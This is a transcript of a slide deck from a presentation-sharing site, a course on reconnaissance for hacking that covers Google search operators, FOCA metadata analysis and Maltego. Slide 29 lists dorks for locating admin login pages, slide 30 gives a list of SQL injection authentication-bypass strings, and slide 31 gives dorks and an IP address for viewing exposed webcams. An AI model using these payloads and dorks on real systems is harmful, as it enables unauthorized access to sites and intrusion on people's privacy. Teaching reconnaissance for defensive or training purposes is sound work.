Presentation is loading. Please wait.

Presentation is loading. Please wait.

Course about Information Gathering for Hacking. Agenda day 1 Introduction about Information Gathering Why information are useful Using free tool Let’s.

Published byMoses Park Modified over 8 years ago

Similar presentations

Presentation on theme: "Course about Information Gathering for Hacking. Agenda day 1 Introduction about Information Gathering Why information are useful Using free tool Let’s."— Presentation transcript:

1 Course about Information Gathering for Hacking

2 Agenda day 1 Introduction about Information Gathering Why information are useful Using free tool Let’s start: gather information !

3 Agenda day 2 Tools & Techniques Browser power Using DNS Using Google Free tools: Maltego Foca Summarizing all information

4 Agenda day 3 Ready for attack Decide how to attack Live demo ! Question ?

5 Introduction about Information Gathering Through reconnaissance, an attacker can gather a large amount of information about a site, domain or IP address This information can be used to plan an attack It can be obtained with freely available tools … or using the browser

6 Where Does This Information Come From? Web 2.0…How I <3 thee… Public data and records. Information that is mandatory for the Internet (DNS, whois, MX). Private data we pay for i.e. Lexis Nexis/Choice Point/Find a Friend/Spoke/Zoominfo. Data placed there by the target. Data placed there by the target's users.

7 Why information are useful: How to link the real world and the digital world Real World Emails Persons Phone numbers Address Documents Patents / Projects Sentences / Words... Habits / Hobbies Social affinities … Digital World IP, hosts, netblocks, AS Whois records / rWhois Forward and reverse DNS Google Document metadata Twitter, Facebook,... XFN, vCards, hCards Face detection,... ip2geo, Google

8 Types of Information Gathering Passive Semi-Passive Active

9 Passive Information Gathering Great care is taken to ensure that the target organization does not detect the profiling. This means that no packets can ever be sent to the target. This type of profiling is typically time intensive. NO TRAFFIC

10 Semi-Passive Information Gathering Profiling the target with methods that would appear to the target as normal Internet traffic and behavior. NORMAL TRAFFIC

11 Active Information Gathering This type of profiling should be detected by the target organization. Actively seeking out new/unpublished servers, directories, files, documents along with full network visibility scans. ABNORMAL TRAFFIC

12 Google Hacking Web Hacking: Pick a site, find the vulnerability Google Hacking : Pick a vulnerability, find the site.

13 How Google Works Googlebot, a web crawler that finds and fetches web pages. The indexer that sorts every word on every page and stores the resulting index of words in a huge database. The query processor which compares your search query to the index and recommends the documents that it considers most relevant.

14 How Googlebot Works Googlebot finds pages in two ways through an add URL form, www.google.com/addurl.html www.google.com/addurl.html through finding links by crawling the web.

15 Indexer and Query Processor Indexer Googlebot gives the indexer the full text of the pages it finds. These pages are stored in Google’s index database in alphabetic order. each index entry store a list of documents in which the term appears and the location within the text where it occurs. Query Processor Page Ranking puts more important pages at high rank. Intelligent Technique for learning relationships and associations within the stored data Spelling Correcting System

16 The Basics Some important things to keep in mind Google queries are not case sensitive. The * wildcard represents any word Example: “* insurance quote” Google stems words automatically Example: “automobile insurance quote” brings up sites with “auto … “.

17 The Basics The + symbol forces inclusion of a certain word. “auto insurance +progressive” The - symbol forces exclusion of a certain word. (Site:progressive.com – site:www.progressive.com) The | symbol provides boolean OR logic. “auto insurance + inurl:(progressive | geico)”

18 Information Disclosure with Google Advanced Search Operators site: (.edu,.gov, foundstone.com, usc.edu) filetype: (txt, xls, mdb, pdf,.log) Daterange: (julian date format) Intitle / allintitle Inurl / allinurl

19 Advanced Operators link:URL = lists other pages that link to the URL. related:URL = lists other pages that are related to the URL. site:domain.com “search term” = restricts search results to the given domain. allinurl:WORDS = shows only pages with all search terms in the url. inurl:WORD = like allinurl: but filters the URL based on the first term only. allintitle:WORD = shows only results with terms in title. intitle:WORD = similar to allintitle, but only for the next word. cache:URL = will show the Google cached version of the URL.

20

21

22

23

24

25 The Basics There are many more advanced operators. Combining these creatively is the key to Google Hacking. http://www.googleguide.com/advanced_operator s_reference.html BUT DO YOU REALLY NEED TO REMEMBER IT

26 Advanced Search with Google

27 INTERESTING SEARCHES… Now that we’ve gotten this boring stuff out of the way, let’s introduce some Google hacks.

28 Google and Proxy Use www.google.com/translate to by-pass Internet Browser Security Settings.www.google.com/translate Find a proxy that works, and enter in the URL inurl:”nph-proxy.cgi” “start using cgiproxy” inurl:”nph-proxy.cgi” “Start browsing through this CGI- based proxy”

29 Gaining auth bypass on an admin account There is a large number of google dork for basic sql injection "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp"

30 SQL Injection Keep the username as "Admin“ and for password type one of the following ' or '1'='1 ' or 'x'='x ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 – blah’ 'or'1=1'

31 Few more interesting Searches Browsing images of the site Site: xxxxxxx in Google image Browse Live Video Cameras inurl:”viewerframe?mode=motion” (http://202.212.193.26:555/ViewerFrame?Mode=Motion&Language=0) Intitle:”Live View / - AXIS” Browse Open Webcams Worldwide Axis Webcams : inurl:/view.shtml or inurl:view/index.shtmlinurl:/view.shtmlinurl:view/index.shtml Cannon Webcams: sample/LvAppl/sample/LvAppl/ Server versioning intitle:index.of “server at”

32 GOOGLE HACK Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches You can also use this program to use google as a proxy

33 GOOGLE Hack screen shot

34 Screenshot of GOOLAG SCANNER

35 Using Tools Some important things to keep in mind Google queries are not case sensitive. The * wildcard represents any word Example: “* insurance quote” Google stems words automatically Example: “automobile insurance quote” brings up sites with “auto … “.

36 FOCA: metadata “Secret” relationships Government & companies Companies & providers Piracy Reputation Social engineering attacks Targeting Malware

37 FOCA: File types supported Office documents: – Open Office documents. – MS Office documents. – PDF Documents. XMP. – EPS Documents. – Graphic documents. EXIF. XMP. – Adobe Indesign, SVG, SVGZ

38 What can be found? Users: – Creators. – Modifiers. – Users in paths. C:\Documents and settings\jfoo\myfile /home/johnnyf Operating systems. Printers. – Local and remote. Paths. – Local and remote. Network info. – Shared Printers. – Shared Folders. – ACLS. Internal Servers. – NetBIOS Name. – Domain Name. – IP Address. Database structures. – Table names. – Colum names. Devices info. – Mobiles. – Photo cameras. Private Info. – Personal data. History of use. Software versions.

39 Sample: FBI.gov Total: 4841 files

40 DNS Search Panel

41 Huge domains case

42 Digital Certificates

43 FOCA & Shodan

44 FOCA URL Analysis

45 .listing

46 Unsecure http Methods

47 Search & Upload

48 Searching for Server-Side Technologies

49 RDP & ICA Files Analysis

50 Squid Proxies

51 DNS Records

52 Netrange Scan

53 Easy Bugs search

54 Task List

55 Plugins

56 Maltego Paterva Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.

57 Maltego: which information People Groups of people (social networks) Companies Organizations Web sites Internet infrastructure such as: Domains DNS names Netblocks IP addresses Phrases Affiliations Documents and files These entities are linked using open source intelligence. Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux. Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections. Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away. Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.

58 Maltego Paterva

59

60 Maltego ce: web site

61 Maltego ce: twitter

62 Few interesting Websites www.archive.org Archive of websites (Time Machine) www.readnotify.com Find out when your email gets read, Retract, Certify, Track & much more www.guerrillamail.com (provides you with disposable e-mail addresses which expire after 15 Minutes. www.gorillaemail.com Email Marketing solutions that allows you to Send, Track and Confirm delivery of Emails, Newsletters, Events etc.

63 Open source: some links DNS, Whois, http://dnshistory.org,... http://www.netcraft.com, http://www.robtex.com,... http://www.ip2geo.com, http://www.maxmind.com,... http://www.infogreffe.com, http://www.societe.com,... http://fr.espacenet.com, http://www.inpi.com,... http://twitter.com, http://www.monster.com, http://www.facebook.com, http://www.linkedin.com, http://www.alchemyapi.com, http://www.opencalais.com,...

Download ppt "Course about Information Gathering for Hacking. Agenda day 1 Introduction about Information Gathering Why information are useful Using free tool Let’s."

Similar presentations

WordPress Installation for Beginners Sheila Bergman

WordPress Installation for Beginners Sheila Bergman
The Internet.

The Internet.
Introduction Lesson 1 Microsoft Office 2010 and the Internet

Introduction Lesson 1 Microsoft Office 2010 and the Internet
Basic Internet Terms Digital Design. Arpanet The first Internet prototype created in 1965 by the Department of Defense.

Basic Internet Terms Digital Design. Arpanet The first Internet prototype created in 1965 by the Department of Defense.
Google Chrome & Search C Chapter 18. Objectives 1.Use Google Chrome to navigate the Word Wide Web. 2.Manage bookmarks for web pages. 3.Perform basic keyword.

Google Chrome & Search C Chapter 18. Objectives 1.Use Google Chrome to navigate the Word Wide Web. 2.Manage bookmarks for web pages. 3.Perform basic keyword.
Chapter 2 Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering.

Chapter 2 Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering.
Compliance on Demand. Introduction ComplianceKeeper is a web-based Licensing and Learning Management System (LLMS), that allows users to manage all Company,

Compliance on Demand. Introduction ComplianceKeeper is a web-based Licensing and Learning Management System (LLMS), that allows users to manage all Company,
SOFTWARE PRESENTATION ODMS (OPEN SOURCE DOCUMENT MANAGEMENT SYSTEM)

SOFTWARE PRESENTATION ODMS (OPEN SOURCE DOCUMENT MANAGEMENT SYSTEM)
FOCA 2.5 Chema Alonso. What’s a FOCA? FOCA on Linux?

FOCA 2.5 Chema Alonso. What’s a FOCA? FOCA on Linux?
Google Search Using internet search engine as a tool to find information related to creativity & innovation.

Google Search Using internet search engine as a tool to find information related to creativity & innovation.
Ahmad Radaideh.  Abstract  Introduction  Google Cached Content  GOOGLE HACKING Procedures  Google Advance Operators  Google hacking Result Categories.

Ahmad Radaideh.  Abstract  Introduction  Google Cached Content  GOOGLE HACKING Procedures  Google Advance Operators  Google hacking Result Categories.
Introduction The Basic Google Hacking Techniques How to Protect your Websites.

Introduction The Basic Google Hacking Techniques How to Protect your Websites.
What is the Internet? Internet: The Internet, in simplest terms, is the large group of millions of computers around the world that are all connected to.

What is the Internet? Internet: The Internet, in simplest terms, is the large group of millions of computers around the world that are all connected to.
Content  Overview of Computer Networks (Wireless and Wired)  IP Address, MAC Address and Workgroups  LAN Setup and Creating Workgroup  Concept on.

Content  Overview of Computer Networks (Wireless and Wired)  IP Address, MAC Address and Workgroups  LAN Setup and Creating Workgroup  Concept on.
Web Servers How do our requests for resources on the Internet get handled? Can they be located anywhere? Global?

Web Servers How do our requests for resources on the Internet get handled? Can they be located anywhere? Global?
Searching The Web Search Engines are computer programs (variously called robots, crawlers, spiders, worms) that automatically visit Web sites and, starting.

Searching The Web Search Engines are computer programs (variously called robots, crawlers, spiders, worms) that automatically visit Web sites and, starting.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
URL Obscuring COEN 152/252 Computer Forensics  Thomas Schwarz, S.J. 2004.

URL Obscuring COEN 152/252 Computer Forensics  Thomas Schwarz, S.J
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Hands-On Microsoft Windows Server 2008 Chapter 8 Managing Windows Server 2008 Network Services.

Hands-On Microsoft Windows Server 2008 Chapter 8 Managing Windows Server 2008 Network Services.

Similar presentations

Ads by Google